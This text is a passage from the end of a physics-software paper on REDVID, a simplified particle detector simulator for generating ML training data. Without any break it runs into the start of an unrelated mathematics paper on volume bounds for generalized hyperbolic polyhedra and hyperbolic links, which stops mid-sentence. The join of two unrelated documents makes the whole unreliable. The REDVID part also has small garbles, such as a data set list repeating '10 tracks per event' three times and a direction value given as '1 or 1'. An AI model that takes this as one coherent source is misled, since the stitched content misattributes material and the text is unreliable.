disk or cylinder shapes, ultimately arriving at a Reduced-Order Model (ROM). Particle typesThe particle type plays a major role in its traversal path through the detector. In fact, as stated in Section 2, one of the major applications of track reconstruction is to assign the particle type. Currently, we consider a single particle type in our event simulator. This characteristic can be expanded in the future. Simplified tracksIn the real detector, tracks follow an arc of helix like path and not an exact one. This path is not the case for all particles and the charged characteristic of a particle of interest is a defining factor. Currently, we consider particles traversing a straight line. This indirectly suggests that either the single particle type we consider is one with no charge, or alternatively, we do not consider a magnetic field, which is present in the real detector. Collision pointsThe real experiments involve multiple collisions happening almost at the same time. The collision points will not be at the same spot. Even the collision of interest that is intended for track reconstruction will not perfectly align to the detector's origin point. The neighbouring collisions will also pollute the detector readings with particles associated to them. We consider a single event at the origin for our event simulations. Hit coordinates smearingWhen it comes to instrumentation noise, there is no well-defined grand complication present. The amount of noise in real experiments depends on the characteristics of the sensors and material. We introduce noise in our hit calculations and hit coordinate parameters by drawing random samples from a Gaussian distribution. We also consider the noise standard deviation as proportional to the variable range. Like the rest of REDVID's features, the noise ratio can be adjusted by the user. ### Detector model At its core, a detector model is comprised of the geometric definitions of the included elements, shapes, sizes, and placements in space. Although we can support a variety of detector geometries, the overall structure, especially for our experimental results, is based on the ATLAS detector. Accordingly, there are four sub-detector types, _Pixel, Short-strip, Long-strip_ and _Barrel_. The pixel and the barrel types have cylindrical shapes with the pixel being a filled cylinder, while the barrel being a cylinder shell with open caps. These are not hard requirements as the geometry is fully parametric and differing definitions can be opted for, e.g., a pixel as a cylinder shell. The long-strip and the short-strip types are primarily intended as flat disks, but can be defined as having a thickness, rendering them as cylinders. Sub-detector types can be selectively present or absent. Figure 3 depicts a representative variation of the detector geometry involving the aforementioned elements. Structurally speaking, in a real-world detector, e.g., ATLAS detector, the internals of short-strip and long-strip sub-detector types are different. We on the other hand, reduce such complexities to placement location and size, i.e., distance from the origin and sub-detector disk radius. Note that our geometric model does support disk thickness, which basically would turn disks into shallow cylinders. However, we have considered flat disks for our experiments. ### Particle collision event simulation As mentioned above, one of the simplifications for our complexity reduction approach is to consider a single collision per event, Figure 3. The fully parametric detector geometry, allowing for inclusion/exclusion of different sub-detector types, with full control over sub-layer counts, sizes and placements. Figure 2. An overview of a reduced simulation as part of a ML model design workflow, e.g., a Neural Architecture Search (NAS), by providing the data set. This paper focuses on the area with the yellow fill, covered by our simulation tool, REDVID. aligning exactly to the origin point of the detector geometry. However, the list of complexities, even without the polluting effects of multiple collisions, is extensive. Particles travelling through the detector matter could lead to secondary collisions, resulting in drastic changes in their trajectory. Such secondary collisions could also lead to the release of particles not originating from the collision event itself. These will show up as tracks with unusual starting points within the detector space, rather distant from the collision point. Some particles could also come to a halt, which would be seen as abruptly terminating tracks. Such physics-accurate complexities of particles interacting with the present matter in detectors is not considered for our simulator. It must be noted that the generation of tracks originating far away from the origin and prematurely terminating tracks, can be added to our simulator in a randomised fashion. ## 4. Implementation Though our detector generator and event simulation modules support both two-dimensional (2D) and three-dimensional (3D) spaces, we will focus on the implementation details relevant to the three-dimensional case. Let us simply mention that the main difference between the two would be the presence of circles and cylinders for 2D and 3D spaces, respectively. One can consider the rather simplistic 2D space as a form of sanity check set-up for initial testing of techniques and methodologies of ML-assisted solution workflows. REDVID is open source (Krause et al., 2017) and has been developed in Python. ### Modules Considering the tasks at hand, detector spawning and event simulation, our software can be divided into three main logical modules: * To spawn a detector based on the provided geometric specifics and configuration. * To execute experiments involving many events, following the experiment configuration, e.g., hit probability, number of tracks (fixed/variable), track randomisation protocol, etc. * To collect the expected outputs, i.e., the generated data set, as well as automated report generation on the important configuration and a statistical overview of the data set. An overview diagram of the modules is depicted in Figure 4. The current implementation considers the sequential execution of modules in the order given above. However, one can easily generate detectors without simulating events, or simulate events with previously generated detectors, or even calculate hits based on previously generated tracks. Such input/output capability will allow our software to interact with other commonly utilised tools. The main configuration parameter defining the execution path within our tool is the detector_type, which can be 2D or 3D. ### Coordinate systems For the case of the 3D space, we have opted for the cylindrical coordinate system to represent all elements, i.e., sub-detectors, tracks and hits. The cylindrical coordinate system, depicted in Figure 5, is a convenient choice, as we are considering the Z-axis as the beam pipe in LHC experiments and all geometric shapes defined within a detector, whether disks or cylinders, are actually of the type cylinder. The three parameters to define any point in the cylindrical coordinate system are the radial distance from the Z-axis, the azimuthal angle between the X-axis and the radius, and the height of the point from the XY-plane, i.e., \(r\), \(\theta\) and \(z\), respectively. Note that in terms of the orientation of the coordinate system, we consider the Z-axis to be horizontal. With the assumption of the beam pipe's alignment along the Z-axis, this is the most convenient orientation for defining different geometric elements. In this coordinate system, hit points can be precisely defined given the tuple \((r_{hit},\theta_{hit},z_{hit})\). Geometric shapes can also be defined with boundaries for \(r_{sd}\) and \(z_{sd}\), e.g., a disk will have fixed \(z_{sd}\), unbounded \(\theta\) and bounded \(r_{sd}\). Here \(sd\) stands for sub-detector. Our software does support partial disks, i.e., a disk with a hole in the middle, which can be considered when the beam pipe is expected to be part of the geometry. Disks with thickness (cylinders) will have a small boundary for the parameter \(z_{sd}\). As previously explained, short-strip and long-strip sub-detector types are defined as disks. For the pixel type, as it is a filled cylinder, both \(r_{sd}\) and \(z_{sd}\) will be bounded. When it comes to the barrel type, as it is a cylinder shell, there will be a fixed \(r_{sd}\) with bounded \(z_{sd}\). To implement linear tracks and to define them in the cylindrical coordinate system, both a direction vector and a point, \(P_{0}\), that the track (line) goes through are needed. The direction vector, \(V_{d}\), is considered as a vector from the origin, landing on a point in space, represented with a tuple \((r_{d},\theta_{d},z_{d})\). The direction vector is randomised and then normalised for the \(z\) parameter, meaning that the direction vector will either have \(z_{d}=1\) or \(z_{d}=-1\). The boundaries of this randomisation depend on the track randomisation protocol, explained in the next section. Currently, we consider all tracks origination from the detector origin, meaning that the point \((0,0,0)\) is considered on the track. The resulting parametric form of a track (line) is, \[r =t\cdot r_{d}\,,\] \[\theta =\theta_{d}\,,\] \[z =t\cdot z_{d}\,,\] with \((r,\theta,z)\) representing a point on the track and \(t\) being the free variable. ### Track randomisation protocols As seen in Figure 4, the track randomisation step directly affects sub-detector hit calculation and is totally dependent on the randomisation protocol indicated in the configuration. Focusing on the implementation for the 3D space, different track randomisation protocols can be considered. We list four base protocols and five combination protocols, mixing the characteristics of base protocols: _Protocol 1 - Last layer hit guarantee._: Hits are guaranteed to occur on the farthest layer of every sub-detector type, which means the farthest layer of every sub-detector type is the randomisation domain for the landing points of tracks. A hit guarantee on the last layer will also guarantee hits on the previous layers for that sub-detector type. This protocol is designed to maximise the number of hits per sub-detector type within the data set. _Protocol 2 - Spherically uniform distribution._ To have a more uniform distribution of randomised tracks, without imposing any geometric conditions, is to have the track end points land on a sphere. Note that tracks do not have actual end points as these are unbounded lines. _Protocol 3 - Conical jet simulation._ Tracks are randomised in distinct subsets, bundled in a close vicinity within a narrow cone, representing a jet(s). This protocol on its own may not be a sensible choice and it would work best in combination with other protocols. _Protocol 4 - Beam pipe concentration._ The tracks will have a higher concentration around the beam pipe, i.e., higher track generation probability as the radius gets smaller. _Protocols 1 and 3._ While still landing on the last sub-detector layer, there are distinct subsets of tracks bundled in a close vicinity as jets. In other words, jets will be mixed with regular tracks. _Protocols 1 and 4._ While still landing on the last sub-detector layer, the tracks landing on the short-strip and the long-strip sub-detector types will have a higher concentration around the beam pipe, i.e., higher track generation probability as the radius gets smaller for these sub-detector types. Tracks landing on the barrel sub-detector type will not be affected. _Protocols 2 and 3._ While still having uniformly distributed tracks landing on a sphere, there will be uniformly distributed distinct subsets of tracks bundled in a close vicinity as jets. _Protocols 3 and 4._ The tracks will have a higher concentration around the beam pipe, i.e., higher track generation probability as the radius gets smaller. There will be jet formation also with higher probability of occurring around the beam pipe. _Protocols 1, 3 and 4._ This combination is the same as the previous, protocols 3 and 4, with the additional condition that the tracks are guaranteed to land on the last layer per sub-detector type. Note that for our data generation we have only considered protocol 1 to increase recorded hit points for all tracks and to have hit points for all sub-detector types. Needless to say, additional track randomisation protocols focusing on specific corner cases, can be easily defined and added to the tool. To implement protocol 1, i.e., to guarantee that tracks land on the last layer of a sub-detector type, we consider the coordinate domain of the last layer as the randomisation domain for track direction vectors. Thus, before normalisation, all randomised \(V_{d}\) will land on the last layer. As it can be deduced from the above protocol descriptions, not every combination is allowed, as some of the base protocols are mutually exclusive. For instance, protocols 1 and 2 cannot be applied at the same time, as it is self-evident that a spherical uniform distribution and a last layer hit guarantee cannot be true at the same time. Accordingly, we can consider the base protocols within two main categories, _distribution protocols_, affecting how tracks are distributed in space, and _feature protocols_, defining special forms of localised distribution. Currently, protocol 3 is the only feature protocol defined. While feature protocols can be combined with any distribution protocol, most distribution protocols are mutually exclusive. A combination of two or more base distribution protocols will also lead to another, more specific, distribution protocol, e.g., protocols 1 and 4. The diagram in Figure 6 provides a visual overview of different protocol combinations. ### Hit point calculation Regarding hit point coordinates, i.e., \((r_{hit},\theta_{hit},z_{hit})\), depending on the sub-detector shape, we are dealing with either a fixed \(z_{sd}\) or a fixed \(r_{sd}\), for disks and barrels, respectively. Here, we consider the disks as being flat and to have no thickness, while the barrels consist only of cylinder shells, with no thickness. Shapes with thickness are supported, for which the techniques involved will be similar. Figure 4. An overview of the REDVID modules, including a detector model generator, an event simulator, generating randomised tracks and calculating sub-detector hit points based on tracks and geometric data, as well as different reporting elements. Figure 5. Basic definition and parameters of the cylindrical coordinate system, radial distance, azimuthal, height (\(r\), \(\theta\), \(z\)), which is the basis of our geometric structures. Considering the set of track equations, we are to calculate the free variable \(t\) at the sub-detector layer of interest. This specific \(t\) is denoted as \(t_{sd}\), i.e., \(t\) at sub-detector. For hit coordinates at disks, \[z_{hit} =z_{sd}\,,\] \[\theta_{hit} =\theta_{d}\,,\] \[t_{sd} =\frac{z_{sd}}{z_{d}}=\frac{z_{sd}}{1}\,,\] \[\Rightarrow t_{sd}=z_{sd}\,,\] \[r_{hit} =t_{sd}\cdot r_{d}=z_{sd}\cdot r_{d}\,.\] Note that in the above calculation \(z_{d}\) and \(z_{sd}\) must have matching signs, rendering \(t_{sd}>0\). In other words, tracks extruding towards the positive or the negative side of the \(Z\)-axis can hit sub-detector layers present at the positive or the negative side of the \(Z\)-axis, respectively. We also know that \(z_{d}\neq 0\). A similar calculation considering the \(r_{sd}\) as fixed will result in the hit coordinates for a barrel sub-detector layer, which we will not repeat here. ### Available configuration We have pointed out a few important configuration options in Figure 4, i.e., geometry options as a whole, track randomisation and options related to sensing and smearing probabilities when recording hits. Looking at the available options in further detail, REDVID is highly _(re)configurable_. _3D geometry options._ It is possible to set the detector ID2, the coordinates for the origin and the centre of each element, the presence of different sub-detector types, thick or flat structure, span over the radius and the \(z\) parameters including inner and outer radii, sub-layer counts per sub-detector type, and the distance between consecutive sub-layers per sub-detector type. Spawned detector geometries can be saved for future use. Footnote 2: The detector ID can be set to auto-generate as well. _Experiment options._ It is possible to set the experiment name, hit coordinate smearing (noise generation), event count, fixed or variable track count with minimum and maximum bounds for the latter, track randomisation protocol, and hit occurrence probability. _Generic execution options._ A complete folder structure is constructed, only requiring an anchor path to be configured. _Non-determinism invoking options._ Though it is desirable to reduce the behavioural-space, as we have done extensively, it is of utmost importance not to arrive at a deterministic simulation. In REDVID, we invoke non-determinism in the simulated behaviour by allowing different randomisations per event, i.e., mandatory randomisation of track parameters, optional track count randomisation, optional introduction of smearing for hit point parameters (noise), and optional hit point occurrence (recording) probability. Resulting from the modular design, different intermediate data input/output points can be arranged, allowing REDVID to interact with other available tooling. For instance, track data generated by external Monte Carlo event generators can be used alongside a spawned detector geometry to calculate hit points. Needless to say, the input data has to be in a format compatible with REDVID. ## 5. Data set generation We have considered a number of workloads consisting of both detector spawning and event simulation tasks. We have followed simulation recipes with 10 000 events, and varying track counts, [1, 10 000] per event for each experiment, listed below. Hit recording is performed with smearing enabled and the detector geometry is the same for all recipes. These generated data sets are intended as reference for physicists and data scientists alike and are publicly accessible over Zenodo open repository [(20)]. * 10 000 events, 1 track per event, hit coordinate smearing enabled * 10 000 events, 10 tracks per event, hit coordinate smearing enabled * 10 000 events, 10 tracks per event, hit coordinate smearing enabled * 10 000 events, 10 tracks per event, hit coordinate smearing enabled ### Data set schema Considering that all of the above data sets are for the 3D domain, the schema and relevant elaborations for the generated data are listed below. * An incremental identifier for events belonging to an experiment, which is unique within the scope of the experiment. * An incremental identifier for different sub-detector layers belonging to a geometry, which is unique within the scope of the geometry. * The type of the sub-detector layer recording a hit, which can be one of three available types, pixel, short-strip, or long-strip. * An incremental identifier for tracks belonging to an event, which is unique within the scope of the event. * Indicates the type of function defining the track in terms of polynomial degree. At the moment, all tracks are linear. * The \(r\) coordinate of the \((r_{0},\theta_{0},z_{0})\) tuple defining the point \(P_{0}\), used in a track's parametric set of equations. This value is currently zero. Figure 6. Visualising how different base distribution and feature protocols can be combined to achieve more complex track randomisation behaviour. - The \(\theta\) coordinate of the \((r_{0},\theta_{0},z_{0})\) tuple defining the point \(P_{0}\), used in a track's parametric set of equations. This value is currently zero. * The \(z\) coordinate of the \((r_{0},\theta_{0},z_{0})\) tuple defining the point \(P_{0}\), used in a track's parametric set of equations. This value is currently zero. * The \(r\) coordinate of the \((r_{d},\theta_{d},z_{d})\) tuple defining the direction vector \(V_{d}\), used in a track's parametric set of equations. * The \(\theta\) coordinate of the \((r_{d},\theta_{d},z_{d})\) tuple defining the direction vector \(V_{d}\), used in a track's parametric set of equations. * The \(z\) coordinate of the \((r_{d},\theta_{d},z_{d})\) tuple defining the direction vector \(V_{d}\), used in a track's parametric set of equations. This value will be 1 or 1, depending on which side of the XY-plane the track is being extruded from. * An incremental identifier for hits belonging to an event, which is unique within the scope of the event. * The \(r\) coordinate of the \((r_{hit},b_{hit},z_{hit})\) tuple defining the recorded hit point on the relevant sub-detector. * The \(\theta\) coordinate of the \((r_{hit},b_{hit},z_{hit})\) tuple defining the recorded hit point on the relevant sub-detector. * The \(z\) coordinate of the \((r_{hit},b_{hit},z_{hit})\) tuple defining the recorded hit point on the relevant sub-detector. ### Performance benchmarking In order to evaluate the performance of REDVID, we have benchmarked the execution of simulations with a lower event count, 1 000 events per simulation and similar variations of track concentrations per event as before, i.e., \([1,10\,000]\). For our metric collections, including CPU-time and execution duration, high-precision counters from the time library available in Python have been used. The collected CPU-time results are provided in Table 1. Simulations have been performed on the DAS-6 compute cluster (Brandt et al., 2017). The machines used are each equipped with a single 24-core AMD EPYC 7402P processor and 128 GB of main memory. Note that the mean CPU-time calculations do not include the first event of each recipe batch. This is due to the presence of cold-start effect for the first event and delays resulting from it. Though we have enforced single-threaded operation for our benchmarks, workload parallelisation is rather trivial. The number of events to be generated can be divided into any desired number of batches and distributed amongst multiple threads. Considering the timing results, we observe that the CPU-time values scale linearly, i.e., a tenfold increase in the track concentration per event results in roughly a tenfold increase in the full simulation CPU-time. ### User operation Whether independently, or as an integrated module within a workflow, similar to the depiction from Figure 2, Users can use REDVID primarily to generate data sets. The main script to execute the tool is digital_detector.py(Garay et al., 2017). A configuration file is included and populated with parameter values. Users only have to change the anchor_path parameter to a valid path. This will be system dependent. Alternatively, a different configuration file path can be provided as an argument. The default name is REDVID_config.ini, which can also be changed. Python package dependencies are minimal and can be observed in the requirements file. ## 6. Related Work Although the overall available data is abundant, corner case data is rather scarce. Such real-world data, or data synthesised with accurate (in our case physics-accurate) simulations is complex in terms of data dimensionality and granularity. This complexity is directly resulting from the complexity of the real system, or the accurate (physics-accurate) model of the system in case of simulations. Within the HEP landscape for instance, we touched upon the complexity of simulators such as Geant4 in Section 2, as well as the dependence on these simulators by tools like ATLFAST. The first challenge, lack of annotated data for one or more specific scenarios, has been recognised in the literature (Garay et al., 2017). The second challenge though, the issue of complexity, is not as well known. A closely related acknowledgement has been made regarding the complexity level of models for simulations (Garay et al., 2017). The two main shortcomings of the previous efforts towards the use of ML in physics problems have been use-case specificity (Willard et al., 2017) and the lack of user-friendly tools (Brandt et al., 2017). As noted by Willard et al. (Willard et al., 2017), the efforts surrounding the use of ML for physics-specific problems are focused on sub-topics, or even use-cases. Although our methodology and synthetic data focuses on the domain of tracking for detector data, we could claim that it is independent of the chosen detector experiment. The point from (Willard et al., 2017) regarding the computational efficiency of ROMs matches our motivation. Where our work differs is in the placement of our ROM within our methodology. Our reduced model of a detector is considered as the model for simulations resulting in synthetic data generation, which is different than ML-based surrogate models as ROMs (Brandt et al., 2017; Garay et al., 2017), or ML-based surrogate models built from ROMs (Willard et al., 2017). ## 7. Conclusion and Future Work We have argued why there is a need for reduced complexity simulations when designing ML-assisted solutions. We pointed out how a reduction in simulation complexity through ROMs and a smaller behavioural-space for the simulator will result in a lower complexity for synthesised data. This is particularly the case for our HEP use-case. We have described the design and implementation details of our simulation framework fulfilling such a reduction, the REDuced Virtual Detector (REDVID). We have provided computational cost figures for REDVID with example workload recipes and have made available the resulting data sets over Zenodo open repository. Even though our tool is developed in Python, computational cost figures (case in point, 15 seconds, 138 seconds and 22 minutes of CPU-time for 1 000 events with 10, 100 and 1 000 tracks per event, respectively) indicate efficiency for frequent executions. Accordingly, the light-weight nature of REDVID simulations makes our tool a suitable choice as a simulation-in-the-loop with data-driven workflows for HEP. One major example is the case of searching for a ML-assisted solution, addressing the challenge of particle track reconstruction. However, reduced complexity and less descriptive data, distances our simulations from the physics-accurate ground truth. We have explained that to opt for such an approximation is a deliberate act, positioning REDVID as a suitable middle ground amongst other available tools, not as exact as physics-accurate simulations and not as synthetic as dummy data generators. The reduced complexity especially allows for early problem formulation and testing at early stages, when dealing with ML-assisted solution design workflows. Yet another advantage of reduced complexity data that still respects the high-level relations, is in its pedagogical merit, enabling problem solving practices in higher education. Future workWhile keeping the distance from physics-accurate tools, REDVID can be extended in numerous ways. Considering our foreseen methodology, we will be implementing further low-cost, complexity inducing features, e.g., various track randomisation protocols to allow for diverse particle propagation scenarios, complex non-linear track definitions, origin smearing, and possibly a Domain-Specific Language (DSL) to be used for virtual detector definitions. Aside from REDVID itself, we intend to implement the full ML-assisted solution search workflow depicted in Figure 2 and perform explorations of models based on different ML architectures. ## Acknowledgments This project is supported by the Nederlandse Organisatie voor Wetenschappelijk Onderzoek (NWO), a.k.a., the Dutch Research Council.
2307.04543
Upper bounds for volumes of generalized hyperbolic polyhedra and hyperbolic links
A polyhedron in a three-dimensional hyperbolic space is said to be generalized if finite, ideal and truncated vertices are admitted. In virtue of Belletti's theorem (2021) the exact upper bound for volumes of generalized hyperbolic polyhedra with the same one-dimensional skeleton $G$ is equal to the volume of an ideal right-angled hyperbolic polyhedron whose one-dimensional skeleton is the medial graph for $G$. In the present paper we give the upper bounds for the volume of an arbitrary generalized hyperbolic polyhedron, where the bonds linearly depend on the number of edges. Moreover, it is shown that the bounds can be improved if the polyhedron has triangular faces and trivalent vertices. As an application there are obtained new upper bounds for the volume of the complement to the hyperbolic link having more than eight twists in a diagram.
Andrey Egorov, Andrei Vesnin
2023-07-10T13:20:21Z
http://arxiv.org/abs/2307.04543v1
# Upper bounds for volumes of generalized hyperbolic polyhedra and hyperbolic links ###### Abstract. A polyhedron in a three-dimensional hyperbolic space is said to be generalized if finite, ideal and truncated vertices are admitted. In virtue of Belletti's theorem (2021) the exact upper bound for volumes of generalized hyperbolic polyhedra with the same one-dimensional skeleton \(G\) is equal to the volume of an ideal right-angled hyperbolic polyhedron whose one-dimensional skeleton is the medial graph for \(G\). In the present paper we give the upper bounds for the volume of an arbitrary generalized hyperbolic polyhedron, where the bonds linearly depend on the number of edges. Moreover, it is shown that the bounds can be improved if the polyhedron has triangular faces and trivalent vertices. As an application there are obtained new upper bounds for the volume of the complement to the hyperbolic link having more than eight twists in a diagram. Key words and phrases:hyperbolic space, volumes of hyperbolic polyhedra, hyperbolic knots and links, augmented links 2000 Mathematics Subject Classification: 52B10, 51M10, 57M25 The authors were supported by the Theoretical Physics and Mathematics Advancement Foundation "BASIS". A.V. was also supported by the state contract of the Sobolev Institute of Mathematics (project no. FWNF-2022-0004). hyperbolic polyhedron, then each of its vertices is 4-valent, i.e. incident to exactly four edges. Calculation of the volume of a hyperbolic polyhedron given by its combinatorics and dihedral angles is a rather difficult problem. A solution of this problem for a particular family of tetrahedra goes back to Lobachevsky. Some modern results and methods related to the problem are presented in works of Milnor [30], Kellerhals [24], Vinberg [40], Kashaev [22], Cho and Kim [13], Murakami and Yano [31], where polyhedra with finite, ideal, or truncated vertices were under considerations. Moreover, for some classes of hyperbolic polyhedra of fixed combinatorics, such as simplexes and pyramids, there are known volumes bounds depending of number of vertices or edges. Due to the Mostow rigidity theorem, calculations of volumes and volume bounds have strigthforward applications in the theory of hyperbolic 3-manifolds and in the knot theory [38]. Below in the formulae for the volumes of three-dimensional hyperbolic polyhedra and manifolds we will use the _Lobachevsky function_ introduced by Milnor in [30], \[\Lambda(\theta)=-\int\limits_{0}^{\theta}\log|2\sin(t)|\,\mathrm{d}t.\] To formulate results on upper and lower volume bounds the two constants will be used which have the following values with an accuracy of up to six digits: \[v_{tet}=3\Lambda(\pi/3)=1.014941\quad\text{and}\qquad v_{oct}=8\Lambda(\pi/4 )=3.663863.\] Approximate numerical values of quantities expressed in terms of the Lobachevsky function will be given with the same accuracy up to six digits. In the preset paper we will give the upper bounds for the volume of generalized hyperbolic polyhedra, where the bounds linearly depend on the number of edges. In Section 2 we recall the definition of a generalized hyperbolic polyhedron. It was shown by Belletti in [11] that the maximum volume of generalized hyperbolic polyhedra with the same 1-skeleton is achieved on the corresponding ideal right-angled hyperbolic polyhedron, see Theorem 2.1. Bounds for the volumes of ideal right-angled hyperbolic polyhedra in terms of the number of vertices were previously obtained in [5, 8, 18, 19]. Basing on these results, in the Theorem 2.2 we obtain the upper bounds for the volumes of generalized hyperbolic polyhedra given as a linear function of the number of edges. **Theorem 2.2**.: _Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is a 1-skeleton. Then the following inequalities hold._ * _If_ \(P\) _is a tetrahedron, then_ \(\operatorname{vol}(P)\leq v_{oct}\)_._ * _If_ \(P\) _is not a tetrahedron, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-\frac{5v_{oct}}{2}.\] * _If_ \(E>24\)_, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-3v_{oct}.\] The Section 3 deals with the case when there is an additional information about the combinatorics of a generalized polyhedron. Namely, in the Theorem 3.4 the upper bounds for volumes are obtained by taking into account the number of triangular faces and trivalent vertices of the polyhedron. **Theorem 3.4.**_Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is the 1-skeleton._ 1. _If_ \(P\) _has_ \(V_{3}\) _trivalent vertices and_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\cdot\left(E-\frac{p_{3}+V_{3}+8}{4} \right).\] 2. _If all vertices of_ \(P\) _are trivalent and there are_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant\frac{5v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10} \right).\] In Section 4 we provide examples of applying bounds from Theorems 2.2 and 3.4 to three infinite families of generalized hyperbolic polyhedra: pyramids, prisms and pyramids with two apexes. In Section 5 we present the relationship between the volumes of hyperbolic polyhedra and bounds for the volumes of hyperbolic knots and links via the number of twists in their diagrams. Relations of such type were previously discussed in [4, 16, 28, 34]. In the Theorem 5.1 we obtain an upper bound for the volumes of hyperbolic knots and links with the number of twists in the diagram greater than eight. **Theorem 5.1.**_Let \(D\) be a hyperbolic diagram of a link \(K\) with \(t(D)\) twists. If \(t(D)>\)8, then_ \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot(t(D)-1.4).\] Finally we demonstrate that the bound from Theorem 5.1 improves the previously known bounds. ## 2. Volume of a generalized hyperbolic polyhedron To define a generalized hyperbolic polyhedron we will use a projective model of a hyperbolic space and follow [10, 11, 38, 39]. Consider the symmetric bilinear form defined on \(\mathbb{R}^{4}\) as \[\langle\mathbf{x},\mathbf{y}\rangle=-x_{0}y_{0}+x_{1}y_{1}+x_{2}y_{2}+x_{3}y_ {3}.\] With the standard embedding of \(\mathbb{R}^{3}\) in \(\mathbb{RP}^{3}\), which maps the point \((x_{1},x_{2},x_{3})\in\mathbb{R}^{3}\) to the point in \(\mathbb{RP}^{3}\) with homogeneous coordinates \((1,x_{1},x_{2},x_{3})\), a subset \(\mathbb{H}^{3}\) corresponds to an open unit ball in \(\mathbb{R}^{3}\). At the same time, geodesics in \(\mathbb{H}^{3}\) are intersections of \(\mathbb{H}^{3}\) with projective lines from \(\mathbb{RP}^{3}\) or, equivalently, with lines from \(\mathbb{R}^{3}\subset\mathbb{RP}^{3}\). Similarly, the (totally geodesic) hyperbolic planes in \(\mathbb{H}^{3}\) correspond to nonempty intersections of \(\mathbb{H}^{3}\) and projective planes from \(\mathbb{RP}^{3}\), or equivalently, with affine planes from \(\mathbb{R}^{3}\). In the projective model of the hyperbolic space \(\mathbb{H}^{3}\), the following duality holds. For a \(k\)-dimensional, \(0\leq k\leq 2\), projective subspace \(\ell\subset\mathbb{RP}^{3}\), consider the corresponding \((k+1)\)-dimensional linear subspace \(L\subset\mathbb{R}^{4}\). Then the subspace \(L^{\perp}\), orthogonal to \(L\) with respect to the form \(\langle\,\ \rangle\) introduced above, is a \((3-k)\)-dimensional linear subspace in \(\mathbb{R}^{4}\) and defines \((2-k)\)-dimensional projective subspace \(\ell^{\perp}\subset\mathbb{RP}^{3}\). In particular, if \(x\in\mathbb{RP}^{3}\setminus\overline{\mathbb{H}}^{3}\), then \(x^{\perp}\) is a plane that intersects \(\mathbb{H}^{3}\), and the point \(x\) is called _hyperideal_. The realization of a convex Euclidean polyhedron in the projective model of the space \(\mathbb{H}^{3}\) will be called a _generalized hyperbolic polyhedron_ if each of its vertices is finite, ideal or hyperideal. In this case, each edge of the polyhedron must contain internal points of the hyperbolic space. To each hyperideal point \(p\) we assign a _polar plane_\(\Pi_{p}\subset\mathbb{H}^{3}\), which is a plane orthogonal to all lines passing through \(\mathbb{H}^{3}\) and \(p\). The plane \(\Pi_{p}\) divides \(\mathbb{H}^{3}\) into two half-spaces, denote by \(H_{p}\subset\mathbb{H}^{3}\) the one that contains \(0\in\mathbb{R}^{3}\). A generalized hyperbolic polyhedron \(P\) will be called _proper_ if for each hyperideal vertex \(v\) of the polyhedron \(P\) the interior of the half-space \(H_{v}\) contains all the finite vertices of the polyhedron \(P\). Let \(P\) be a generalized hyperbolic polyhedron and \(U(P)\) be the set of all its hyperideal vertices. We define _truncation_\(P_{tr}\) of a generalized hyperbolic polytope \(P\) as the following set: \[P_{tr}=P\bigcap_{v\in U(P)}H_{v}.\] Then _volume of the generalized polyhedron_\(P\) is defined as the volume of its truncation \(P_{tr}\). Note that if the polyhedron \(P\) is proper, then the dihedral angles at the new edges arising after truncation are equal to \(\pi/2\). Following [11] we will say a polyhedron \(\overline{\Gamma}\subset\mathbb{R}^{3}\subset\mathbb{RP}^{3}\) is a _rectification_ of a 3-connected planar graph \(\Gamma\) if the 1-skeleton \(\overline{\Gamma}\) coincides with \(\Gamma\) and all edges of \(\overline{\Gamma}\) are tangent to \(\partial H^{3}\). Notice that \(\overline{\Gamma}\) is not a generalized hyperbolic polyhedron since none of its edges intersect \(\mathbb{H}^{3}\). Nevertheless, for \(\overline{\Gamma}\), it is possible, as above, to define a truncation \(\overline{\Gamma}_{tr}\), which will be an ideal right-angled polyhedron whose 1-skeleton is the medial graph for \(\Gamma\). By the volume \(\operatorname{vol}(\overline{\Gamma})\) of the rectification \(\overline{\Gamma}\) we will understand the volume \(\operatorname{vol}(\overline{\Gamma}_{tr})\) of its truncation \(\overline{\Gamma}_{tr}\). In [9, Corollary 10] Atkinson obtained the following upper bound. Let \(P\) be a non-obtuse hyperbolic polyhedron cantaining \(V_{3}\) trivalent vertices and \(V_{4}\) quadrivalent vertices. Then \[\operatorname{vol}(P)<\frac{2V_{4}+3V_{3}-2}{4}\cdot v_{oct}+\frac{15V_{3}+20V _{4}}{16}\cdot v_{tet}. \tag{1}\] In [11] Beletti established that the volume of an arbitrary generalized hyperbolic polyhedron can be estimated from above by the volume of an ideal right-angled hyperbolic polyhedron constructed from its 1-skeleton. **Theorem 2.1**.: _[_11_, Theorem 4.2]_ _For any 3-connected planar graph \(\Gamma\),_ \[\sup_{P}\operatorname{vol}(P)=\operatorname{vol}(\overline{\Gamma}),\] _where \(P\) varies among all proper generalized hyperbolic polyhedra with 1-sceleton \(\Gamma\) and \(\overline{\Gamma}\) is the rectification of \(\Gamma\)._ By definition, the volume of the rectification \(\overline{\Gamma}\) is equal to the volume of the polyhedron \(\overline{\Gamma}_{tr}\) that is an ideal right-angled hyperbolic polyhedron such that its 1-skeleton is the medial graph of the graph \(\Gamma\). By construction, all vertices of \(\overline{\Gamma}_{tr}\) are quadrivalent. Recall that if \(G\) is a plane embedding of a graph then _medial graph_ for it is a graph \(M(G)\) such that the vertices of \(M(G)\) correspond one-to-one to the edges of \(G\) and for each face \(G\) if two edges in it go sequentially then the corresponding vertices from \(M(G)\) are connected by an edge. The initial list of ideal right-angled polyhedra is presented in [18], where the first 248 values of the volumes of such polyhedra are also computed. A well-known infinite family of ideal right-angled polyhedra is the family of \(n\)-antiprisms for integers \(n\geq 3\). In particular, the 3-antiprism is an octahedron. The formula for the volumes of ideal \(n\)-antiprisms with cyclic symmetry was obtained by Thurston [38] in connection with the calculation of the volumes of the family of chain links. The arithmeticity of the groups generated by reflections in the faces of ideal right-angled antiprisms (and, consequently, the arithmeticity of the groups of the corresponding chain links) was investigated in papers [25] and [29]. Two-sided bounds for the volumes of ideal right-angled hyperbolic polyhedra in terms of the number of their vertices were obtained by 